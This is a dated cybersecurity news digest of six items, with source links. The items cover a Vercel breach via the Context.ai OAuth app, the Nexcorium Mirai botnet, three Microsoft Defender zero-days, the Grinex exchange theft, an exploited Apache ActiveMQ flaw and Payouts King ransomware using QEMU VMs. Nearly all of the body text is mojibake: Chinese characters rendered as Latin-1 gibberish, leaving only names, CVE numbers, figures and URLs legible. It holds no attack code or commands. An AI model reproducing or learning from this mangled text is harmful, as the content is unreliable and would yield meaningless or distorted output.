VercelÅû¶°²È«·ì϶£ºÔ±¹¤ÕË»§ÔâAI¹¤¾ßÈëÇÖ

°ä²¼¹¦·ò 2026-04-20

1. VercelÅû¶°²È«·ì϶£ºÔ±¹¤ÕË»§ÔâAI¹¤¾ßÈëÇÖ


4ÔÂ19ÈÕ  £¬ÔÆ¿ª·¢Æ½Ì¨Vercel½üÈÕÅû¶ÁËһ·°²È«ÊÂÎñ  £¬³ÆÓÐδ¾­ÊÚȨµÄµÚÈý·½ÈëÇÖÁËÆä²¿ÃÅÄÚ²¿ÏµÍ³ ¡£¸Ã¹«Ë¾°µÊ¾  £¬Õâ´ÎÊÂÎñÒÑÓ°Ï첿Ãſͻ§  £¬µ«ÆäÖ÷Ìâ·þÎñ¡¢Next.js¡¢Turbopack¼°ÆäËû¿ªÔ´ÏîÄ¿¾ùδÊÜÓ°Ïì ¡£Ä¿Ç°  £¬VercelÒÑÀñƸÊÂÎñÏìӦר¼ÒЭÖúµ÷²é  £¬²¢ÒÑ֪ͨ·¨Âɲ¿ÃÅ ¡£¾ÝºóÐø¸üР £¬Õâ´Î°²È«·ì϶ԴÓÚµÚÈý·½AI¹¤¾ßContext.aiµÄGoogle Workspace OAuthÀûÓÃÔâµ½ÈëÇÖ  £¬µ¼ÖÂÒ»ÃûVercelÔ±¹¤µÄGoogle WorkspaceÕË»§±»¹¥ÆÆ ¡£¹¥»÷ÕßËæºóÀûÓøÃÕË»§ÌáÉýÁËÔÚVercel»·¾³ÖеĽӼûȨÏÞ  £¬²¢³É¹¦Ã¶¾ÙÁËÄÇЩδ±»ÏóÕ÷Ϊ¡°Ãô¸Ó×±µÄ»·¾³±äÁ¿  £¬ÕâЩ±äÁ¿ÔÚ¾²Ì¬´æ´¢Ê±Î´¼ÓÃÜ  £¬Õý±¾½öÓÃÓÚ´æ·Å·ÇÃô¸ÐÐÅÏ¢  £¬µ«¹¥»÷Õßͨ¹ýö¾Ù½øÒ»²½»ñÈ¡Á˽ӼûȨÏÞ ¡£Óë´Ëͬʱ  £¬Ò»Ãû×Գơ°ShinyHunters¡±µÄÍþвÐÐΪÕßÔÚºÚ¿ÍÂÛ̳ÉÏ·¢Ìû  £¬Ðû³ÆÒÑÈëÇÖVercel²¢ÊÔͼÏúÊÛ±»µÁÊý¾Ý  £¬Ô̺¬½Ó¼ûÃÜÔ¿¡¢Ô´´úÂë¡¢Êý¾Ý¿âÊý¾Ý¡¢ÄÚ²¿²¿ÊðºÍAPIÃÜÔ¿µÈ ¡£¸ÃºÚ¿Í»¹·ÖÏíÁËÒ»·ÝÔ̺¬580ÌõVercelÔ±¹¤ÐÅÏ¢£¨ÐÕÃû¡¢ÓÊÏä¡¢ÕË»§×´Ì¬µÈ£©µÄÎı¾Îļþ  £¬ÒÔ¼°Ò»ÕÅÒÉËÆÄÚ²¿½ÚÔìÃæ°åµÄ½ØÍ¼ ¡£¹¥»÷Õß»¹Ðû³ÆÔøÓëVercelÁªÏµ²¢Ìá³öÔ¼200ÍòÃÀÔªµÄÊê½ðÒªÇó ¡£


https://www.bleepingcomputer.com/news/security/vercel-confirms-breach-as-hackers-claim-to-be-selling-stolen-data/


2. Nexcorium½©Ê¬ÍøÂçÀûÓÃTBK DVR¼°ÀϾÉ·ÓÉÆ÷·ì϶´«²¼


4ÔÂ18ÈÕ  £¬FortinetµÄ×êÑÐÈËÔ±·¢ÏÖ  £¬ÍþвÐÐΪÕßÕýÀûÓÃTBK DVRÉ豸ÖеÄÒ»¸öºÅÁî×¢Èë·ì϶£¨CVE-2024-3721£©ÒÔ¼°ÒÑÍ£²úµÄTP-Link·ÓÉÆ÷µÈÆäËûÀϾÉÎïÁªÍøÉ豸µÄ°²È«È±µã  £¬´«²¼Ò»ÖÖÃûΪNexcoriumµÄÐÂÐÍMirai±äÖÖ¶ñÒâÈí¼þ ¡£¹¥»÷Õßͨ¹ý´Û¸ÄÌØ¶¨ÒªÇó²ÎÊý  £¬ÀûÓÃCVE-2024-3721·ì϶´«²¼ÏÂÔØ¾ç±¾ ¡£ÓйØÍøÂçÁ÷Á¿ÖÐÔ̺¬Ò»¸ö×Ô½ç˵µÄ¡°X-Hacked-By¡±±êÍ·  £¬ÆäֵΪ¡°Nexus Team¡±  £¬°µÊ¾Á˹¥»÷ÕߵĿÉÄÜÉí·Ý  £¬µ«¸Ã×éÖ¯µÄ¾ßÌåÇé¿öÈÔ²»Ã÷È· ¡£¸Ã¾ç±¾ÃûΪ¡°dvr¡±  £¬»áÏÂÔØÏóÕ÷Ϊ¡°nexuscorp¡±µÄ¶ñÒâÈí¼þÑù±¾ ¡£¶Ô¡°nexuscorp.x86¡±Ñù±¾µÄ½øÒ»²½·ÖÎöÏÔʾ  £¬¸Ã¶ñÒâÈí¼þÃûΪNexcorium  £¬ÊôÓÚMirai¼Ò×å±äÖÖ  £¬ÔÚÖ´ÐÐʱ»áÏÔʾÊÕÊÜÐÅÏ¢ ¡£ËüʹÓÃXOR½âÂ뷽ʽÌáȡǶÈëʽÅäÖÃÊý¾Ý  £¬Ô̺¬C2·þÎñÆ÷ÐÅÏ¢¡¢¹¥»÷ºÅÁîºÍÓÆ¾Ã»¯¾ç±¾ ¡£ÓëÆäËûMirai±äÖÖÒ»Ñù  £¬Nexcorium½¨ÉèÁ˼ල·¨Ê½¡¢É¨ÃèÆ÷ºÍ¶àÖÖDDoS¹¥»÷Ä£¿é ¡£Ëü»áÖ´ÐÐÆëÈ«ÐԲ鳭  £¬Ò»µ©¼ì²âµ½´Û¸Ä±ã½øÐÐ×ÔÎÒ¸´Ôì ¡£´Ë±í  £¬¸Ã¶ñÒâÈí¼þ»¹Ç¶ÈëÁËÕë¶Ô»ªÎªÉ豸µÄ·ì϶ÀûÓ÷¨Ê½£¨ÈçCVE-2017-17215£©  £¬²¢Ô̺¬´óÁ¿Ä¬ÈÏÍ´´¦  £¬ÓÃÓÚ¶ÔTelnet½Ó¼û½øÐб©Á¦ÆÆ½â ¡£


https://securityaffairs.com/190974/malware/nexcorium-mirai-variant-exploits-tbk-dvr-flaw-to-launch-ddos-attacks.html


3. ΢ÈíDefenderÈýÁãÈÕ·ì϶ÔâÀûÓ㺽öBlueHammerÒѽ¨¸´


4ÔÂ18ÈÕ  £¬½üÆÚ  £¬¹¥»÷ÕßÔÚ»ý¼«ÀûÓÃ΢ÈíDefenderÖÐ×î½üÅû¶µÄÈý¸öÁãÈÕ·ì϶  £¬ÒÔÔÚÊÜϰȾϵͳÉÏ»ñÈ¡¸ü¸ßȨÏÞ ¡£ÕâÈý¸ö·ì϶±ðÀëºÅΪBlueHammer¡¢RedSunºÍUnDefend  £¬ÓÉһλ»¯Ãû¡°Chaotic Eclipse¡±µÄ×êÑÐÈËÔ±·¢ÏÖ ¡£¸Ã×êÑÐÈËÔ±ÔÚ¹«¿ªÆ·ÆÀ΢Èí¶Ô·ì϶Åû¶µÄ´¦Ö÷½Ê½ºó  £¬²»½öÅû¶ÁË·ì϶ϸ½Ú  £¬»¹°ä²¼ÁËÕë¶Ô佨¸´Windows·ì϶µÄ¸ÅÏëÑéÖ¤´úÂë ¡£ÆäÖÐ  £¬BlueHammerºÍRedSunÔÊÐí¹¥»÷ÕßÔÚMicrosoft DefenderÖÐʵÏÖ±¾µØÈ¨ÏÞÌáÉý  £¬¶øUnDefendÔò»á´¥·¢»Ø¾ø·þÎñ¹¥»÷  £¬×èÖ¹°²È«½ç˵¸üР £¬´Ó¶ø¼õÈõϵͳµÄÕûÌå·À»¤ÄÜÁ¦ ¡£½ØÖÁĿǰ  £¬Î¢Èí½ö½¨¸´ÁËBlueHammer·ì϶  £¬²¢ÎªÆä·ÖÅäÁ˱àºÅCVE-2026-33825  £¬µ«RedSunºÍUnDefendÈÔδµÃµ½½¨²¹ ¡£¾ÝHuntress×êÑÐÈËÔ±»ã±¨  £¬ÕâÈý¸ö·ì϶Òѱ»ÏÖʵÓÃÓÚ¹¥»÷»î¶¯  £¬Ö»¹ÜÊܺ¦Õߺ͹¥»÷ÕߵľßÌåÉí·ÝÉв»Ã÷ÏÔ ¡£Huntress°µÊ¾  £¬¹¥»÷Õß´Ó2026Äê4ÔÂ10ÈÕÆðÍ·ÀûÓÃBlueHammer·ì϶·¢Õ¹¹¥»÷  £¬ËæºóÔÚ4ÔÂ16ÈÕÓÖʹÓÃÁËRedSunºÍUnDefend·ì϶½øÐиÅÏëÑéÖ¤¹¥»÷ ¡£×êÑÐÈËÔ±ÒÔΪ  £¬¹¥»÷ÕߺܿÉÄÜÔÚʹÓÃChaotic EclipseÔÚÍøÉϹ«¿ª°ä²¼µÄ·ì϶ÀûÓôúÂë ¡£


https://securityaffairs.com/190961/hacking/microsoft-defender-under-attack-as-three-zero-days-two-of-them-still-unpatched-enable-elevated-access.html


4. GrinexÂòÂôËùÔâ1370ÍòÃÀÔª¹¥»÷ºóÍ£ÔË


4ÔÂ17ÈÕ  £¬×ܲ¿Î»ÓÚ¼ª¶û¼ªË¹Ë¹Ì¹µÄ¼ÓÃÜÇ®±ÒÂòÂôËùGrinexÔÚÔâ·êÒ»³¡Éæ¼°1370ÍòÃÀÔªµÄºÚ¿Í¹¥»÷ºó  £¬ÒÑÔÝÍ£ÔËÓª ¡£¸ÃÆ½Ì¨ÖØÒª·þÎñÓÚ¶íÂÞ˹Óû§  £¬ÔÊÐí¶íÂÞ˹ÆóÒµºÍÓ×ÎÒÖ®¼ä½øÐмÓÃÜÇ®±ÒÓ묲¼µÄ¶Ò»»ÂòÂô ¡£±»µÁ×ʽðÖ±½ÓÀ´×Ô¶íÂÞ˹Óû§µÄ¼ÓÃÜÇ®±ÒÇ®°ü ¡£¾ÝGrinex°ä²¼µÄÉêÃ÷  £¬Õâ´Î¹¥»÷µÄÀàÐͺÍÊý×Ö×ã¼£Åú×¢  £¬ÍþвÐÐΪÕßÓë¡°±í¹úµý±¨»ú¹¹¡±ÓйØ  £¬ÕâЩ»ú¹¹Õ¼ÓÓװǰËùδÓеÄ×ÊÔ´ºÍ¼¼Êõ  £¬Ö»ÓежԹú¶ÈµÄʵÌåÄÜÁ¦»ñµÃ¡± ¡£¸ÃÂòÂôËùÐû³Æ  £¬Æ¾¾Ý³õ²½Êý¾Ý  £¬ÕâÊÇÒ»´ÎÖ¼ÔÚÖ±½ÓÇÖº¦¶íÂÞ˹½ðÈÚÖ÷ȨµÄЭµ÷¹¥»÷ ¡£È»¶ø  £¬ÎÞÂÛÊÇGrinexµÄÉêÃ÷  £¬»¹ÊÇÇø¿éÁ´·ÖÎö¹«Ë¾EllipticÓëTRM LabsµÄ»ã±¨  £¬¾ùδÌṩÈκξßÌåµÄ¼¼ÊõÖ¤¾Ý»òÖ¸±êÀ´Ö§³Ö½«Õâ´Î¹¥»÷¹é×ïÓÚÎ÷·½µý±¨»ú¹¹ ¡£EllipticÅû¶  £¬ÍµÇÔÊÂÎñ²úÉúÓÚÖÜÈýUTC¹¦·ò12:00  £¬±»µÁ×ʽ𱻷¢ËÍÖÁTRONºÍÒÔÌ«·»µØÖ·  £¬Ëæºóͨ¹ýSunSwapÈ¥ÖÐÐÄ»¯ÂòÂôºÍ̸ת»»ÎªTRXºÍETH ¡£


https://www.bleepingcomputer.com/news/security/grinex-exchange-blames-western-intelligence-for-137m-crypto-hack/


5. ¸ßΣApache ActiveMQ·ì϶Ôâ»ý¼«ÀûÓÃ


4ÔÂ17ÈÕ  £¬ÃÀ¹úÍøÂ簲ȫºÍ»ù´¡ÉèÊ©°²È«¾Ö£¨CISA£©ÖÜËİ䲼ÖÒ¸æ³Æ  £¬±¾ÔÂÔçЩʱ³½½¨¸´µÄÒ»¸ö¸ßΣApache ActiveMQ·ì϶ĿǰÕý±»»ý¼«ÓÃÓÚÏÖʵ¹¥»÷ ¡£¸Ã·ì϶±àºÅΪCVE-2026-34197  £¬ÔÚ³¤´ï13ÄêµÄ¹¦·òÀïδ±»·¢ÏÖ  £¬×îÖÕÓÉHorizon3×êÑÐÔ±Naveen Sunkavally½èÖúClaude AI¸±ÊÖ·¢ÏÖ ¡£Apache ActiveMQÊÇ×îÊ¢ÐеĻùÓÚJavaµÄ¿ªÔ´ÐÂÎÅ´úÀí  £¬¿í·ºÀûÓÃÓÚÀûÓ÷¨Ê½Ö®¼äµÄÒ첽ͨѶ ¡£¾ÝSunkavallyÚ¹ÊÍ  £¬¸Ã·ì϶ԴÓÚÊäÈëÑéÖ¤²»µ±  £¬Ê¹µÃ¾­¹ýÉí·ÝÑéÖ¤µÄ¹¥»÷Õß¿ÉÄÜͨ¹ý×¢Èë¹¥»÷Ö´ÐÐËÁÒâ´úÂë ¡£ApacheÊØ»¤ÈËÔ±ÒÑÓÚ3ÔÂ30ÈÕÔÚActiveMQ Classic 6.2.3ºÍ5.19.4°æ±¾Öн¨¸´Á˸ÃÎÊÌâ ¡£Ä¿Ç°  £¬Íþв¼à¿Ø·þÎñShadowServerÒÑ×·×Ùµ½³¬¹ý7500̨¶³öÓÚÍøÂçÉϵÄApache ActiveMQ·þÎñÆ÷ ¡£CISAÒѽ«CVE-2026-34197ÄÉÈëÆäÒÑÖªÀûÓ÷ì϶£¨KEV£©Ä¿Â¼  £¬²¢ºÅÁîÁª¹úÃñÊÂÐÐÕþ²¿ÃÅ£¨FCEB£©»ú¹¹ÔÚÁ½ÖÜÄÚ£¨¼´4ÔÂ30ÈÕ֮ǰ£©ÊµÏÖ¶ÔActiveMQ·þÎñÆ÷µÄ½¨²¹¹¤×÷ ¡£


https://www.bleepingcomputer.com/news/security/cisa-flags-apache-activemq-flaw-as-actively-exploited-in-attacks/


6. Payouts KingÀûÓÃQEMU·ÂÕÕÆ÷ÔËÐаµ²ØÐé¹¹»ú


4ÔÂ17ÈÕ  £¬Payouts KingÀÕË÷Èí¼þÔÚÀûÓÿªÔ´µÄQEMU·ÂÕÕÆ÷×÷Ϊ·´ÏòSSHºóÃÅ  £¬ÔÚÊÜϰȾµÄϵͳÉÏÔËÐаµ²ØµÄÐé¹¹»ú  £¬´Ó¶øÈƹýÖն˰²È«´ëÊ© ¡£Æ¾¾ÝÍøÂ簲ȫ¹«Ë¾SophosµÄ×êÑÐÈËÔ±¼Í¼  £¬ËûÃÇ·¢ÏÖÁËÁ½Æð¹¥»÷Õß²¿ÊðQEMUµÄ»î¶¯ ¡£Æ¾¾ÝZscalerµÄ»ã±¨  £¬Payouts King¿ÉÄÜÓëǰBlackBastaÁªÃ˳ÉÔ±ÓйØ  £¬ÒòÆäʹÓÃÁËÀàËÆµÄ³õʼ½Ó¼û²½Öè ¡£¸ÃÀÕË÷Èí¼þѡȡ´óÁ¿»ìºÏºÍ·´·ÖÎö»úÔì  £¬Í¨¹ý´òË㹤×÷³ÉÁ¢ÓƾÃÐÔ  £¬²¢Ê¹ÓõײãϵͳŲÓÃÖÕÖ¹°²È«¹¤¾ß ¡£Æä¼ÓÃܹ滮ΪAES-256£¨CTR£©½áºÏRSA-4096  £¬¶Ô´óÎļþѡȡ¼äЪʽ¼ÓÃÜ ¡£Sophos¼Í¼µÄµÚ¶þÆð»î¶¯×Ô2ÔÂÒÔÀ´Ò»Ïò»îÔ¾  £¬ÀûÓÃCitrixBleed 2·ì϶£¨CVE-2025-5777£©»ñÈ¡³õʼ½Ó¼ûȨÏÞ ¡£¹¥»÷ÕßÔÚÈëÇÖNetScalerÉ豸ºó  £¬²¿Êð¶ñÒâZIP´æµµ  £¬×°ÖÃÃûΪ¡°AppMgmt¡±µÄ·þÎñ  £¬´´½¨±¾µØÖÎÀíÔ±Óû§  £¬²¢×°ÖÃScreenConnect¿Í»§¶ËÒÔʵÏÖÓÆ¾Ã»¯  £¬Ëæºó¿ªÊͲ¢ÌáÈ¡QEMUÈí¼þ°ü  £¬ÔËÐаµ²ØµÄAlpine Linux VM ¡£¹¥»÷ÕßÔÚÐé¹¹»úÄÚ²¿ÊÖ¶¯×°ÖúͱàÒëImpacket¡¢BloodHound.py¡¢MetasploitµÈ¹¤¾ß  £¬½øÐÐÆ¾Ö¤ÍøÂç¡¢Active Directory¿úËźÍÊý¾Ý±íй ¡£


https://www.bleepingcomputer.com/news/security/payouts-king-ransomware-uses-qemu-vms-to-bypass-endpoint-security/